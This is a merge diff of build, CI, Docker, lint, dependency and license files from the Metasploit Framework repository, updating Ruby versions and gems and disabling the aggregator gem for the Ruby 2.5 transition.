Land #9786, disable aggregator for the Ruby 2.5 transition

Land #9684

.dockerignore

@@ -4,7 +4,12 @@
 docker-compose*.yml
 docker/
 !docker/msfconsole.rc
+!docker/entrypoint.sh
 README.md
+.git/
+.github/
+.ruby-version
+.ruby-gemset
 
 .bundle
 Gemfile.local
@@ -30,7 +35,7 @@ config/database.yml
 # target config file for testing
 features/support/targets.yml
 # simplecov coverage data
-coverage
+coverage/
 doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
@@ -86,10 +91,13 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
 .vagrant
+
+# no need for rspecs
+spec/

.github/PULL_REQUEST_TEMPLATE.md

@@ -11,4 +11,5 @@ List the steps needed to make sure this thing works
 - [ ] ...
 - [ ] **Verify** the thing does what it should
 - [ ] **Verify** the thing does not do what it should not
+- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))
 

.gitignore

@@ -78,7 +78,7 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for
@@ -88,3 +88,8 @@ data/meterpreter/ext_server_pivot.*.dll
 
 # local docker compose overrides
 docker-compose.local*
+.env
+
+# Ignore python bytecode
+*.pyc
+rspec.failures

.mailmap

@@ -1,6 +1,7 @@
 acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
 bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
 bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
@@ -30,6 +31,7 @@ lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
 lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
 lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
 pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>

.rubocop.yml

@@ -8,18 +8,57 @@
 
 # inherit_from: .rubocop_todo.yml
 
+AllCops:
+  TargetRubyVersion: 2.2
+
 Metrics/ClassLength:
   Description: 'Most Metasploit modules are quite large. This is ok.'
   Enabled: true
   Exclude:
     - 'modules/**/*'
 
+Metrics/AbcSize:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/CyclomaticComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/PerceivedComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Style/FrozenStringLiteralComment:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
+Style/RedundantReturn:
+  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
+  Enabled: false
+
 Style/Documentation:
   Enabled: true
   Description: 'Most Metasploit modules do not have class documentation.'
   Exclude:
     - 'modules/**/*'
 
+Layout/IndentHeredoc:
+  Enabled: false
+  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+
+Style/GuardClause:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/NegatedIf:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/ConditionalAssignment:
+  Enabled: false
+  Description: 'This is confusing for folks coming from other languages'
+
 Style/Encoding:
   Enabled: true
   Description: 'We prefer binary to UTF-8.'
@@ -53,9 +92,10 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Style/SpaceInsideBrackets:
-  Enabled: false
-  Description: 'Until module template are final, most modules will fail this.'
+Layout/AlignParameters:
+  Enabled: true
+  EnforcedStyle: 'with_fixed_indentation'
+  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
 
 Style/StringLiterals:
   Enabled: false

.ruby-version

@@ -1 +1 @@
-2.3.3
+2.5.1

.travis.yml

@@ -11,15 +11,25 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.3.3'
+  - '2.3.7'
+  - '2.4.4'
+  - '2.5.1'
 
 env:
-  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
-  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
-  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
 
 matrix:
   fast_finish: true
+
+jobs:
+  # build docker image
+  include:
+  - env: CMD="docker-compose build" DOCKER="true"
+    # we do not need any setup
+    before_install: skip
+    install: skip
+    before_script: skip
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
   - rake --version
@@ -27,14 +37,19 @@ before_install:
   - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
+  # Update the bundler
+  - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml
   - bundle exec rake --version
   - bundle exec rake db:create
   - bundle exec rake db:migrate
-script:
   # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
+  - git diff --exit-code db/schema.rb
+script:
+  - echo "${CMD}"
+    # we need travis_wait because the Docker build job can take longer than 10 minutes
+  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
 
 notifications:
   irc: "irc.freenode.org#msfnotify"
@@ -47,3 +62,6 @@ branches:
   except:
     - gh-pages
     - metakitty
+
+services:
+  - docker

.yardopts

@@ -2,7 +2,7 @@
 --exclude samples/
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
---files CONTRIBUTING.md,COPYING,HACKING,LICENSE
+--files CONTRIBUTING.md,COPYING,LICENSE
 app/**/*.rb
 lib/msf/**/*.rb
 lib/metasploit/**/*.rb

CONTRIBUTING.md

@@ -45,8 +45,8 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
+* **Do** [reference associated issues] in your pull request description.
+* **Do** write [release notes] once a pull request is landed.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 
@@ -58,8 +58,8 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
   - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
 * **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
-* **Do** include instructions on how to setup the vulnerable environment or software
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
+* **Do** include instructions on how to setup the vulnerable environment or software.
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
 
 
 
@@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2017, Rapid7, Inc.
+Copyright (C) 2006-2018, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

Dockerfile

@@ -0,0 +1,63 @@
+FROM ruby:2.5.1-alpine3.7
+LABEL maintainer="Rapid7"
+
+ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ENV APP_HOME /usr/src/metasploit-framework/
+ENV NMAP_PRIVILEGED=""
+ENV BUNDLE_IGNORE_MESSAGES="true"
+WORKDIR $APP_HOME
+
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
+COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
+COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
+COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
+
+RUN apk update && \
+    apk add \
+      bash \
+      sqlite-libs \
+      nmap \
+      nmap-scripts \
+      nmap-nselibs \
+      postgresql-libs \
+      python \
+      python3 \
+      ncurses \
+      libcap \
+      su-exec \
+    && apk add --virtual .ruby-builddeps \
+      autoconf \
+      bison \
+      build-base \
+      ruby-dev \
+      libressl-dev \
+      readline-dev \
+      sqlite-dev \
+      postgresql-dev \
+      libpcap-dev \
+      libxml2-dev \
+      libxslt-dev \
+      yaml-dev \
+      zlib-dev \
+      ncurses-dev \
+      git \
+    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
+    && gem update --system \
+    && gem install bundler \
+    && bundle install --system $BUNDLER_ARGS \
+    && apk del .ruby-builddeps \
+    && rm -rf /var/cache/apk/*
+
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
+
+ADD ./ $APP_HOME
+
+# we need this entrypoint to dynamically create a user
+# matching the hosts UID and GID so we can mount something
+# from the users home directory. If the IDs don't match
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
+ENTRYPOINT ["docker/entrypoint.sh"]
+
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

Gemfile

@@ -6,8 +6,6 @@ gemspec name: 'metasploit-framework'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
   # code coverage for tests
-  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
   gem 'simplecov'
 end
 
@@ -19,12 +17,10 @@ group :development do
   # for development and testing purposes
   gem 'pry'
   # module documentation
-  gem 'octokit', '~> 4.0'
-  # session aggregator, native builds have issues on arm platforms for now
-  gem 'metasploit-aggregator' if [
-    'x86-mingw32', 'x64-mingw32',
-    'x86_64-linux', 'x86-linux',
-    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  gem 'octokit'
+  # Metasploit::Aggregator external session proxy
+  # disabled during 2.5 transition until aggregator is available
+  #gem 'metasploit-aggregator'
 end
 
 group :development, :test do
@@ -37,14 +33,10 @@ group :development, :test do
   # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
   # environment is development
   gem 'rspec-rails'
+  gem 'rspec-rerun'
 end
 
 group :test do
-  # cucumber extension for testing command line applications, like msfconsole
-  gem 'aruba'
-  # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails', :require => false
-  gem 'shoulda-matchers'
   # Manipulate Time.now in specs
   gem 'timecop'
 end

Gemfile.local.example

@@ -27,8 +27,6 @@ end
 
 # Create a custom group
 group :local do
-  # Use pry-debugger to step through code during development
-  gem 'pry-debugger', '~> 0.2'
   # Add the lab gem so that the 'lab' plugin will work again
   gem 'lab', '~> 0.2.7'
 end

Gemfile.lock

@@ -1,22 +1,27 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.14.2)
+    metasploit-framework (4.16.48)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
+      backports
       bcrypt
+      bcrypt_pbkdf
       bit-struct
+      dnsruby
+      faker
       filesize
       jsobfu
       json
       metasm
       metasploit-concern
-      metasploit-credential
+      metasploit-credential (< 3.0.0)
       metasploit-model
-      metasploit-payloads (= 1.2.18)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.7)
+      metasploit-payloads (= 1.3.32)
+      metasploit_data_models (< 3.0.0)
+      metasploit_payloads-mettle (= 0.3.7)
+      mqtt
       msgpack
       nessus_rest
       net-ssh
@@ -26,15 +31,16 @@ PATH
       octokit
       openssl-ccm
       openvas-omp
-      packetfu (= 1.1.13.pre)
+      packetfu
       patch_finder
       pcaprub
-      pg
+      pdf-reader
+      pg (= 0.20.0)
       railties
       rb-readline
       recog
       redcarpet
-      rex-arch (= 0.1.4)
+      rex-arch
       rex-bin_tools
       rex-core
       rex-encoder
@@ -43,7 +49,7 @@ PATH
       rex-mime
       rex-nop
       rex-ole
-      rex-powershell
+      rex-powershell (< 0.1.78)
       rex-random_identifier
       rex-registry
       rex-rop_builder
@@ -52,7 +58,8 @@ PATH
       rex-struct2
       rex-text
       rex-zip
-      robots
+      ruby-macho
+      ruby_smb (= 0.0.18)
       rubyntlm
       rubyzip
       sqlite3
@@ -60,320 +67,283 @@ PATH
       tzinfo
       tzinfo-data
       windows_error
+      xdr
+      xmlrpc
 
 GEM
   remote: https://rubygems.org/
   specs:
-    actionpack (4.2.8)
-      actionview (= 4.2.8)
-      activesupport (= 4.2.8)
+    Ascii85 (1.0.3)
+    actionpack (4.2.10)
+      actionview (= 4.2.10)
+      activesupport (= 4.2.10)
       rack (~> 1.6)
       rack-test (~> 0.6.2)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.8)
-      activesupport (= 4.2.8)
+    actionview (4.2.10)
+      activesupport (= 4.2.10)
       builder (~> 3.1)
       erubis (~> 2.7.0)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.8)
-      activesupport (= 4.2.8)
+    activemodel (4.2.10)
+      activesupport (= 4.2.10)
       builder (~> 3.1)
-    activerecord (4.2.8)
-      activemodel (= 4.2.8)
-      activesupport (= 4.2.8)
+    activerecord (4.2.10)
+      activemodel (= 4.2.10)
+      activesupport (= 4.2.10)
       arel (~> 6.0)
-    activesupport (4.2.8)
+    activesupport (4.2.10)
       i18n (~> 0.7)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
-    addressable (2.5.0)
-      public_suffix (~> 2.0, >= 2.0.2)
+    addressable (2.5.2)
+      public_suffix (>= 2.0.2, < 4.0)
+    afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.3.0)
+    arel-helpers (2.6.1)
       activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
-      childprocess (~> 0.5.6)
-      contracts (~> 0.9)
-      cucumber (>= 1.3.19)
-      ffi (~> 1.9.10)
-      rspec-expectations (>= 2.99)
-      thor (~> 0.19)
+    backports (3.11.1)
     bcrypt (3.1.11)
-    bit-struct (0.15.0)
+    bcrypt_pbkdf (1.0.0)
+    bindata (2.4.3)
+    bit-struct (0.16)
     builder (3.2.3)
-    capybara (2.12.1)
-      addressable
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
-      rack (>= 1.0.0)
-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.9)
-      ffi (~> 1.0, >= 1.0.11)
-    coderay (1.1.1)
-    contracts (0.15.0)
-    cucumber (2.4.0)
-      builder (>= 2.1.2)
-      cucumber-core (~> 1.5.0)
-      cucumber-wire (~> 0.0.1)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 4.0)
-      multi_json (>= 1.7.5, < 2.0)
-      multi_test (>= 0.1.2)
-    cucumber-core (1.5.0)
-      gherkin (~> 4.0)
-    cucumber-rails (1.4.5)
-      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
-      mime-types (>= 1.16, < 4)
-      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
-    cucumber-wire (0.0.1)
+    coderay (1.1.2)
+    concurrent-ruby (1.0.5)
+    crass (1.0.3)
     diff-lcs (1.3)
-    docile (1.1.5)
+    dnsruby (1.60.2)
+    docile (1.3.0)
     erubis (2.7.0)
-    factory_girl (4.8.0)
+    factory_girl (4.9.0)
       activesupport (>= 3.0.0)
-    factory_girl_rails (4.8.0)
-      factory_girl (~> 4.8.0)
+    factory_girl_rails (4.9.0)
+      factory_girl (~> 4.9.0)
       railties (>= 3.0.0)
-    faraday (0.11.0)
+    faker (1.8.7)
+      i18n (>= 0.7)
+    faraday (0.14.0)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
     filesize (0.1.1)
-    fivemat (1.3.2)
-    gherkin (4.0.0)
-    google-protobuf (3.2.0)
-    googleauth (0.5.1)
-      faraday (~> 0.9)
-      jwt (~> 1.4)
-      logging (~> 2.0)
-      memoist (~> 0.12)
-      multi_json (~> 1.11)
-      os (~> 0.9)
-      signet (~> 0.7)
-    grpc (1.1.2)
-      google-protobuf (~> 3.1)
-      googleauth (~> 0.5.1)
-    i18n (0.8.1)
+    fivemat (1.3.6)
+    hashery (2.1.2)
+    i18n (0.9.5)
+      concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
-    json (2.0.3)
-    jwt (1.5.6)
-    little-plugger (1.1.4)
-    logging (2.1.0)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.10)
-    loofah (2.0.3)
+    json (2.1.0)
+    loofah (2.2.2)
+      crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
-    memoist (0.15.0)
     metasm (1.0.3)
-    metasploit-aggregator (0.1.3)
-      grpc
-      rex-arch
-    metasploit-concern (2.0.3)
+    metasploit-concern (2.0.5)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.8)
+    metasploit-credential (2.0.14)
       metasploit-concern
       metasploit-model
-      metasploit_data_models
+      metasploit_data_models (< 3.0.0)
       pg
       railties
+      rex-socket
       rubyntlm
       rubyzip
-    metasploit-model (2.0.3)
+    metasploit-model (2.0.4)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.18)
-    metasploit_data_models (2.0.14)
+    metasploit-payloads (1.3.32)
+    metasploit_data_models (2.0.16)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
       metasploit-concern
       metasploit-model
-      pg
+      pg (= 0.20.0)
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.7)
-    method_source (0.8.2)
-    mime-types (3.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2016.0521)
-    mini_portile2 (2.1.0)
-    minitest (5.10.1)
-    msgpack (1.1.0)
-    multi_json (1.12.1)
-    multi_test (0.1.2)
+    metasploit_payloads-mettle (0.3.7)
+    method_source (0.9.0)
+    mini_portile2 (2.3.0)
+    minitest (5.11.3)
+    mqtt (0.5.0)
+    msgpack (1.2.4)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
-    net-ssh (4.1.0)
-    network_interface (0.0.1)
-    nexpose (5.3.1)
-    nokogiri (1.7.0.1)
-      mini_portile2 (~> 2.1.0)
-    octokit (4.6.2)
+    net-ssh (4.2.0)
+    network_interface (0.0.2)
+    nexpose (7.2.0)
+    nokogiri (1.8.2)
+      mini_portile2 (~> 2.3.0)
+    octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
-    os (0.9.6)
-    packetfu (1.1.13.pre)
+    packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.12.4)
+    pdf-reader (2.1.0)
+      Ascii85 (~> 1.0.0)
+      afm (~> 0.2.1)
+      hashery (~> 2.0)
+      ruby-rc4
+      ttfunk
     pg (0.20.0)
     pg_array_parser (0.0.9)
     postgres_ext (3.0.0)
       activerecord (>= 4.0.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.10.4)
+    pry (0.11.3)
       coderay (~> 1.1.0)
-      method_source (~> 0.8.1)
-      slop (~> 3.4)
-    public_suffix (2.0.5)
-    rack (1.6.5)
+      method_source (~> 0.9.0)
+    public_suffix (3.0.2)
+    rack (1.6.9)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
       activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.8)
-      activesupport (>= 4.2.0.beta, < 5.0)
+    rails-dom-testing (1.0.9)
+      activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.3)
-      loofah (~> 2.0)
-    railties (4.2.8)
-      actionpack (= 4.2.8)
-      activesupport (= 4.2.8)
+    rails-html-sanitizer (1.0.4)
+      loofah (~> 2.2, >= 2.2.2)
+    railties (4.2.10)
+      actionpack (= 4.2.10)
+      activesupport (= 4.2.10)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.0.0)
-    rb-readline (0.5.4)
-    recog (2.1.5)
+    rake (12.3.1)
+    rb-readline (0.5.5)
+    recog (2.1.18)
       nokogiri
     redcarpet (3.4.0)
-    rex-arch (0.1.4)
+    rex-arch (0.1.13)
       rex-text
-    rex-bin_tools (0.1.1)
+    rex-bin_tools (0.1.4)
       metasm
       rex-arch
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.7)
-    rex-encoder (0.1.2)
+    rex-core (0.1.13)
+    rex-encoder (0.1.4)
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.11)
+    rex-exploitation (0.1.17)
       jsobfu
       metasm
       rex-arch
       rex-encoder
       rex-text
-    rex-java (0.1.3)
-    rex-mime (0.1.3)
+    rex-java (0.1.5)
+    rex-mime (0.1.5)
       rex-text
-    rex-nop (0.1.0)
+    rex-nop (0.1.1)
       rex-arch
-    rex-ole (0.1.4)
+    rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.69)
+    rex-powershell (0.1.77)
       rex-random_identifier
       rex-text
-    rex-random_identifier (0.1.1)
+    rex-random_identifier (0.1.4)
       rex-text
-    rex-registry (0.1.1)
-    rex-rop_builder (0.1.1)
+    rex-registry (0.1.3)
+    rex-rop_builder (0.1.3)
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.3)
+    rex-socket (0.1.13)
+      rex-core
+    rex-sslscan (0.1.5)
       rex-core
-    rex-sslscan (0.1.2)
       rex-socket
       rex-text
-    rex-struct2 (0.1.0)
-    rex-text (0.2.12)
-    rex-zip (0.1.1)
+    rex-struct2 (0.1.2)
+    rex-text (0.2.16)
+    rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    robots (0.10.1)
-    rspec-core (3.5.4)
-      rspec-support (~> 3.5.0)
-    rspec-expectations (3.5.0)
+    rspec (3.7.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+    rspec-core (3.7.1)
+      rspec-support (~> 3.7.0)
+    rspec-expectations (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.5.0)
-    rspec-mocks (3.5.0)
+      rspec-support (~> 3.7.0)
+    rspec-mocks (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+      rspec-support (~> 3.7.0)
+    rspec-rails (3.7.2)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.5.0)
-      rspec-expectations (~> 3.5.0)
-      rspec-mocks (~> 3.5.0)
-      rspec-support (~> 3.5.0)
-    rspec-support (3.5.0)
-    rubyntlm (0.6.1)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+      rspec-support (~> 3.7.0)
+    rspec-rerun (1.1.0)
+      rspec (~> 3.0)
+    rspec-support (3.7.1)
+    ruby-macho (1.1.0)
+    ruby-rc4 (0.1.5)
+    ruby_smb (0.0.18)
+      bindata
+      rubyntlm
+      windows_error
+    rubyntlm (0.6.2)
     rubyzip (1.2.1)
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
-    shoulda-matchers (3.1.1)
-      activesupport (>= 4.0.0)
-    signet (0.7.3)
-      addressable (~> 2.3)
-      faraday (~> 0.9)
-      jwt (~> 1.5)
-      multi_json (~> 1.10)
-    simplecov (0.13.0)
-      docile (~> 1.1.0)
+    simplecov (0.16.1)
+      docile (~> 1.1)
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.0)
-    slop (3.6.0)
+    simplecov-html (0.10.2)
     sqlite3 (1.3.13)
     sshkey (1.9.0)
-    thor (0.19.4)
+    thor (0.20.0)
     thread_safe (0.3.6)
-    timecop (0.8.1)
-    tzinfo (1.2.2)
+    timecop (0.9.1)
+    ttfunk (1.5.1)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2017.1)
+    tzinfo-data (1.2018.4)
       tzinfo (>= 1.0.0)
-    windows_error (0.1.1)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
-    yard (0.9.8)
+    windows_error (0.1.2)
+    xdr (2.0.0)
+      activemodel (>= 4.2.7)
+      activesupport (>= 4.2.7)
+    xmlrpc (0.3.0)
+    yard (0.9.12)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
-  aruba
-  cucumber-rails
   factory_girl_rails
   fivemat
-  metasploit-aggregator
   metasploit-framework!
-  octokit (~> 4.0)
+  octokit
   pry
   rake
   redcarpet
   rspec-rails
-  shoulda-matchers
+  rspec-rerun
   simplecov
   timecop
   yard
 
 BUNDLED WITH
-   1.14.6
+   1.16.1

HACKING

@@ -1,38 +0,0 @@
-HACKING
-=======
-
-(Last updated: 2014-03-04)
-
-This document almost entirely deprecated by:
-
-CONTRIBUTING.md
-
-in the same directory as this file, and to a lesser extent:
-
-The Metasploit Development Environment
-https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
-
-Common Coding Mistakes
-https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
-
-The Ruby Style Guide
-https://github.com/bbatsov/ruby-style-guide
-
-Ruby 1.9: What to Expect
-http://slideshow.rubyforge.org/ruby19.html
-
-You can use the the "./tools/msftidy.rb" script against your new and
-changed modules to do some rudimentary checking for various style and
-syntax violations.
-
-Licensing for Your New Content
-==============================
-
-By submitting code contributions to the Metasploit Project it is
-assumed that you are offering your code under the Metasploit License
-or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses
-are also fine.  We specifically cannot include GPL code. LGPL code
-is accepted on a case by case basis for libraries only and is never
-accepted for modules.
-
-

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2017, Rapid7, Inc.
+Copyright: 2006-2018, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,21 +15,13 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
-Files: data/templates/to_mem_pshreflection.ps1.template
-Copyright: 2012, Matthew Graeber
-License: BSD-3-clause
-
-Files: data/john/*
-Copyright: 1996-2011 Solar Designer.
-License: GPL-2
-
-Files: external/pcaprub/*
-Copyright: 2007-2008, Alastair Houghton
+Files: data/exploits/mysql/lib_mysqludf_sys_*.so
+Copyright: 2007  Roland Bouman
+           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1
 
-Files: external/ruby-kissfft/*
-Copyright: 2003-2010 Mark Borgerding
-           2009-2012 H D Moore <hdm[at]rapid7.com>
+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
 License: BSD-3-clause
 
 Files: external/source/exploits/IE11SandboxEscapes/*
@@ -79,38 +71,22 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
-Files: lib/bit-struct.rb lib/bit-struct/*
-Copyright: 2005-2009, Joel VanderWerf
-License: Ruby
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
 
-Files: lib/nessus/*
-Copyright: Vlatoko Kosturjak
-License: BSD-3-clause
+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0
 
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby
 
-Files: lib/net/ssh.rb lib/net/ssh/*
-Copyright: 2008 Jamis Buck <jamis@37signals.com>
-License: MIT
-
-Files: lib/packetfu.rb lib/packetfu/*
